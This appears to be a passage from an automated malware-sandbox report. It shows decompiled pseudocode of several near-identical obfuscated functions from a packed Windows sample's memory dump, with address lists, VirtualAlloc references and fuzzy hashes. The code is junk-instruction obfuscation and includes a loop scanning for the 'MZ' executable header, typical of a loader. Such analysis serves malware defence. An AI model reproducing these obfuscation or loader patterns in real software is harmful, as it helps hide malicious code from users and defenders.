						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L56;
					_push(es);
				}
			}

0x004027ac
0x004027ac
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2634a148b7651c2cd38f1ff98d10b37d0a66cd1268643b5075868f41b378a61
Instruction ID: 08e770b07b5f008c63af83a0211df6d9eacd793ce35ebdbf6f9fcd090efd3ff1
Opcode Fuzzy Hash: f2634a148b7651c2cd38f1ff98d10b37d0a66cd1268643b5075868f41b378a61
Instruction Fuzzy Hash: 2C81AF5193EA44C6D217293486486715A48FF97343330EB7F85A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027C2, Relevance: 1.6, APIs: 1, Instructions: 359
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004027C2(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t104;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t138;
				void* _t139;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t275;
				signed long long _t293;
				void* _t294;
				void* _t295;

				_t293 = __fp0;
				_t215 = __esi;
				_t190 = __edi;
				_t163 = __edx;
				_t124 = __ecx;
				_t104 = __ebx;
				_t58 = __eax;
				while(1) {
					_t190 = _t193 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t104 = _t104 >> 0x3f;
					asm("aas");
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t125 = _t124 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t127 = _t125 - 1 + 1;
					_t191 = _t190 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t192 = _t191 + 1;
					if(_t127 != 0) {
						asm("fnop");
						_t164 = _t163 - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						_t163 = _t164 + 1;
						asm("wait");
						asm("fninit");
						_t293 = _t293 / st5;
						asm("pcmpgtd mm4, mm0");
						_t124 = _t127 - 1 + 1;
						_t193 = _t192 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					_t62 = __imp__#690;
					asm("clc");
					asm("fst st1");
					asm("fdivrp st3, st0");
					_t194 = _t192 - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					_t195 = _t194 + 1;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					_t294 = _t293 - st3;
					asm("f2xm1");
					_t166 = _t163 - 1 + 1;
					asm("fcomp st0, st3");
					asm("emms");
					asm("cld");
					asm("fclex");
					asm("wait");
					_t138 = 0x905a4d;
					_t217 = _t215 - 1 + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						_t218 = _t217 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t217 = _t218 + 1;
						_t64 = _t62 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t62 = _t64 - 1;
						asm("clc");
						_t139 = _t138 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						_t138 = _t139 + 1;
						_t275 =  *_t62 - _t138;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (_t275 != 0);
					_t167 = _t166 - 1;
					asm("fsin");
					asm("fclex");
					_t168 = _t167 + 1;
					_t66 = _t62 - 1 + 1;
					asm("fldz");
					_t295 = _t294 - st3;
					_t197 = _t195 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t199 = _t197 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t200 = _t199 - 1;
					_t201 = _t200 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027c2
0x004027c2
0x004027c2
0x004027c2
0x004027c2
0x004027c2
0x004027c2
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bd92b6078327293c121eeb4e715ce06182d89e3f88e0777a398fe92cf1596eb5
Instruction ID: 53585ca100d6232052f21b76a7f8b3e3e3edf1f346beddebe65d9739bacf7c3f
Opcode Fuzzy Hash: bd92b6078327293c121eeb4e715ce06182d89e3f88e0777a398fe92cf1596eb5
Instruction Fuzzy Hash: D671AF5193EA44C6D217293486486715A48FF97343330EB7F89A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027AE, Relevance: 1.6, APIs: 1, Instructions: 359
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004027AE(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t104;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t138;
				void* _t139;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t277;
				signed long long _t295;
				void* _t296;
				void* _t297;

				_t295 = __fp0;
				_t215 = __esi;
				_t190 = __edi;
				_t163 = __edx;
				_t124 = __ecx;
				_t104 = __ebx;
				_t58 = __eax;
				while(1) {
					_t191 = _t190 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t104 = _t104 >> 0x3f;
					asm("aas");
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t125 = _t124 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t127 = _t125 - 1 + 1;
					_t192 = _t191 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t193 = _t192 + 1;
					if(_t127 != 0) {
						asm("fnop");
						_t164 = _t163 - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						_t163 = _t164 + 1;
						asm("wait");
						asm("fninit");
						_t295 = _t295 / st5;
						asm("pcmpgtd mm4, mm0");
						_t124 = _t127 - 1 + 1;
						_t190 = _t193 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					_t62 = __imp__#690;
					asm("clc");
					asm("fst st1");
					asm("fdivrp st3, st0");
					_t194 = _t193 - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					_t195 = _t194 + 1;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					_t296 = _t295 - st3;
					asm("f2xm1");
					_t166 = _t163 - 1 + 1;
					asm("fcomp st0, st3");
					asm("emms");
					asm("cld");
					asm("fclex");
					asm("wait");
					_t138 = 0x905a4d;
					_t217 = _t215 - 1 + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						_t218 = _t217 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t217 = _t218 + 1;
						_t64 = _t62 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t62 = _t64 - 1;
						asm("clc");
						_t139 = _t138 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						_t138 = _t139 + 1;
						_t277 =  *_t62 - _t138;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (_t277 != 0);
					_t167 = _t166 - 1;
					asm("fsin");
					asm("fclex");
					_t168 = _t167 + 1;
					_t66 = _t62 - 1 + 1;
					asm("fldz");
					_t297 = _t296 - st3;
					_t197 = _t195 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t199 = _t197 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t200 = _t199 - 1;
					_t201 = _t200 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027ae
0x004027ae
0x004027ae
0x004027ae
0x004027ae
0x004027ae
0x004027ae
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5abd22b07db5112595a73a2fbadfc67b0871cf4aa31366ef40d378a831e49a42
Instruction ID: 79a20dd00b978e8a589a19e21d1b10d93450d3e80260970206c2700e244416c9
Opcode Fuzzy Hash: 5abd22b07db5112595a73a2fbadfc67b0871cf4aa31366ef40d378a831e49a42
Instruction Fuzzy Hash: D971AE5193EA44CAD217293486486715A48FF97343330EB7F89A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027C4, Relevance: 1.6, APIs: 1, Instructions: 357
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027C4(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027c4
0x0040279d
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x00000000
0x0040279b
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b825bbb3700f2f407d9a2123661b5c48728994e04e9d1512ea3f5972ab5d2557
Instruction ID: 7ce7ee843bbbe35bd690c8283f661d581d8661c27f4cc780d1a3d5684c17a875
Opcode Fuzzy Hash: b825bbb3700f2f407d9a2123661b5c48728994e04e9d1512ea3f5972ab5d2557
Instruction Fuzzy Hash: C971AF5193EA44C6D217293486486715948FF97343330EB7F89A7B60E166BE0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0, Relevance: 1.6, APIs: 1, Instructions: 357
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027B0(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
